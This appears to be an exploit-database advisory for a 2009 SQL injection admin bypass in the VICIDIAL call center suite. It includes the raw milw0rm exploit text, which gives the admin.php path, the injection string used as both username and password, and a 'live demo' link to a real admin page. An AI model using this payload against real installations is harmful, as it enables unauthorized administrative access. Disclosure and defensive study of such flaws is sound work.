VICIDIAL call center suite (Admin Bypass) SQL Injection Vulnerability

vendor:

VICIDIAL call center suite

by:

Striker7

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: VICIDIAL call center suite

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

VICIDIAL call center suite (Admin Bypass) SQL Injection Vulnerability

A vulnerability in VICIDIAL call center suite allows an attacker to bypass authentication and gain access to the administrative panel. This is done by entering ' or '1=1 as the username and password when prompted for authentication.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.

Source

Exploit-DB raw data:

#      _ _ _  _ _ _        _      _ _  _ _ _   _____
# _ _ |_   _| |  _ )  (_) | |__  |     |  _ )      /
#(_-<   | |   | |_//  | | | / /  |---> | |_//     /
#/__/   |_|   | |  \\ |_| |_\_\  |_ _  | |  \\   /
#########################################################################################################
[+] Type Exploit :VICIDIAL call center suite (Admin Bypass) SQL Injection Vulnerability
[+] Script Homepage :http://www.vicidial.org
[+] Discovered By Striker7
[+] Greate : His0k4 , Super Cristal , Yassine_enp , Dreadful ,Str0ke, And ALl Hacker Muslims(Dz)
[+] www.Snakespc.com
[+] Back To Hacker Of Nother Method
#########################################################################################################
 [+] Exploit(Ex):
  http://[Target].com/[path]/admin.php
   then >>
   Username:   ' or '1=1
   Password:   ' or '1=1
   [+]Live Demo:
   http://www.vicidial.org/vicidial/admin.php
#########################################################################################################

# milw0rm.com [2009-05-21]